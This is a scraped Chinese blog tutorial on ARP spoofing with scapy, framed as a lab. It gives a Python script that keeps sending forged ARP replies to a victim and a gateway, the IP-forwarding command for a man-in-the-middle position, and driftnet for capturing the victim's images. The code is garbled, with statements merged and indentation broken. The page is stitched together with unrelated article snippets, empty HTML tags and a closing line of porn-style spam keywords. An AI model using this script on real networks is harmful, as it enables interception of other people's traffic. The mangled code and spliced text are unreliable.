<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    【技術分享】使用scapy進行ARP攻擊

    一顆小胡椒2022-06-30 09:59:11

    ARP協議并不只在發送了ARP請求才接收ARP應答。當計算機接收到ARP應答數據包的時候,就會對本地的ARP緩存進行更新,將應答中的IP和MAC地址存儲在ARP緩存中。因此,當局域網中的某臺機器B向A發送一個自己偽造的ARP應答,而如果這個應答是B冒充C偽造來的,即IP地址為C的IP,而MAC地址是偽造的,則當A接收到B偽造的ARP應答后,就會更新本地的ARP緩存,這樣在A看來C的IP地址沒有變,而它的MAC地址已經不是原來那個了。

    通過ARP欺騙可以對內網數據進行嗅探,在內網滲透中往往也是重要的一部分。

    實驗環境如下

    無線網關:

    IP:192.168.199.1

    MAC: d4-ee-07-67-40-68

    普通用戶:

    IP:192.168.199.213

    MAC:5c:93:a2:fe:29:e3

    攻擊者:

    IP:192.168.199.229

    MAC:30-b4-9e-67-25-47

    實驗環境圖如下:

    一、ARP 欺騙原理

    攻擊者通過構造兩種ARP響應包,分別欺騙普通用戶和網關路由器。

    第一種ARP包中源IP為網關IP(192.168.199.1),源MAC為攻擊者MAC(30:b4:9e:67:25:47),目的IP為普通用戶IP(192.168.199.213),目的MAC為普通用戶MAC(5c:93:a2:fe:29:e3)。當用戶收到此ARP報文則將ARP表中網關的MAC地址更新為攻擊者的MAC(30:b4:9e:67:25:47)。當普通轉發數據時數據則會發向攻擊者的PC上,由攻擊者進行數據轉發。

    第二種ARP包中源IP為普通用戶IP(192.168.199.213),但源MAC為攻擊者MAC(30:b4:9e:67:25:47),目的IP為網關IP(192.168.199.1),目的MAC為網關MAC(d4:ee:07:67:40:68)。網關收到此ARP將ARP表中普通用戶的MAC更新為攻擊者MAC(30:b4:9e:67:25:47)。

    實現代碼如下:

    `def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):

    poison_target=ARP()
    poison_target.op=2poison_target.psrc=gateway_ip
    poison_target.pdst=target_ip
    poison_target.hwdst=target_mac
    poison_gateway=ARP()
    poison_gateway.op=2poison_gateway.psrc=target_ip
    poison_gateway.pdst=gateway_ip
    poison_gateway.hwdst=gateway_macprint "[*] Beginning the ARP poison.[CTRL-C to stop]"while True:    try:
            send(poison_target)
            send(poison_gateway)        print "send sucess!"
            time.sleep(2)    except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)print "[*] ARP poison attack finished."return
    

    通過不間斷的發送這兩種ARP報文,攻擊者以中間人的形式竊取數據報文。

    實驗前普通用戶PC機中ARP表如下:

    實驗開始前,需打開攻擊者的路由轉發功能,若未開啟轉發攻擊,普通用戶則無法正常訪問外網。

    echo 1 > /proc/sys/net/ipv4/ip_forward

    運行腳本:

    查看普通用戶的ARP表項:

    二、進行數據包抓取

    使用scapy抓包代碼如下:

    成功進行了ARP欺騙,訪問外網,能正常訪問

    在攻擊者PC上抓取的數據包,并用wireshark打開如下:

    三、圖片瀏覽

    當被攻擊用戶同瀏覽器訪問圖片文件時,可搭配driftnet進行圖片抓取

    driftnet -i wlan0

    抓取圖片如下:

    macarp
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    數年前,農業銀行在總行層面規劃和建設了VXLAN DCI(Datacenter Interconnect)網絡核心,將內外網Fabric資源池通過DCI高速互聯,并采用原創的多段式VXLAN和兩級外部網絡技術,實現跨Fabric的邏輯分區、資源調度及服務鏈功能,為云原生應用提供超大規模的網絡資源池。該架構業已成為大型金融數據中心網絡的最佳實踐和事實標準,被同業廣泛采用。
    ARP協議并不只在發送了ARP請求才接收ARP應答。當計算機接收到ARP應答數據包的時候,就會對本地的ARP緩存進行更新,將應答中的IP和MAC地址存儲在ARP緩存中。通過ARP欺騙可以對內網數據進行嗅探,在內網滲透中往往也是重要的一部分。網關收到此ARPARP表中普通用戶的MAC更新為攻擊者MAC
    大多數計算機系統設計為可與多個用戶一起使用。特權是指允許用戶執行的操作。普通特權包括查看和編輯文件或修改系統文件。特權升級意味著用戶獲得他們無權獲得的特權。這些特權可用于刪除文件,查看私人信息或安裝不需要的程序,例如病毒。
    一文吃透 Linux 提權
    2021-10-23 07:09:32
    特權升級意味著用戶獲得他們無權獲得的特權。通常,當系統存在允許繞過安全性的錯誤或對使用方法的設計假設存在缺陷時,通常會發生這種情況。結果是,具有比應用程序開發人員或系統管理員想要的特權更多的應用程序可以執行未經授權的操作。
    三層交換機轉發基于目標 IP 地址,數據包的目的地是定義的下一跳,三層交換機遵循路由算法。同樣,當 PC2 在 ARP 響應消息中發送其 MAC 地址時,交換機會收集 PC2 的 MAC 地址并將其存儲到自己的 MAC 地址表中。當數據幀發生沖突,設備必須重新發送數據。沖突對網絡性能有嚴重的負面影響,因此絕對要避免沖突。需要注意的是,二層交換機只能允許主機設備與同一個VLAN的主機通信。中繼端口的智能程度足以承受多個VLAN的流量。
    三層交換機轉發基于目標 IP 地址,數據包的目的地是定義的下一跳,三層交換機遵循路由算法。同樣,當 PC2 在 ARP 響應消息中發送其 MAC 地址時,交換機會收集 PC2 的 MAC 地址并將其存儲到自己的 MAC 地址表中。當數據幀發生沖突,設備必須重新發送數據。沖突對網絡性能有嚴重的負面影響,因此絕對要避免沖突。需要注意的是,二層交換機只能允許主機設備與同一個VLAN的主機通信。中繼端口的智能程度足以承受多個VLAN的流量。
    7 張圖帶你搞懂二層和三層交換機之間的區別
    IP地址沖突是指在局域網中某主機配置了與其他主機相同的IP地址導致原主機無法正常處理業務,這種信息故障事件對于實時交易業務尤其是金融行業業務會帶來嚴重影響,快速檢測網絡中IP地址沖突并定位至關重要。
    最終ARP請求會被轉發到同一網絡中的所有客戶機上。ARP廣播,是在需要與其他主機通信時發出的。IEEE 802.1Q協議規定,在以太網數據幀的目的MAC地址和源MAC地址字段之后、協議類型字段之前加入4個字節的VLAN標簽,用以標識VLAN信息。表示幀類型,取值為0x8100時表示IEEE 802.1Q的VLAN數據幀。PRI3bitPriority,表示數據幀的802.1p優先級。CFI取值為0表示MAC地址以標準格式進行封裝,為1表示以非標準格式封裝。為了提高處理效率,設備內部處理的數據幀一律都是Tagged幀。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类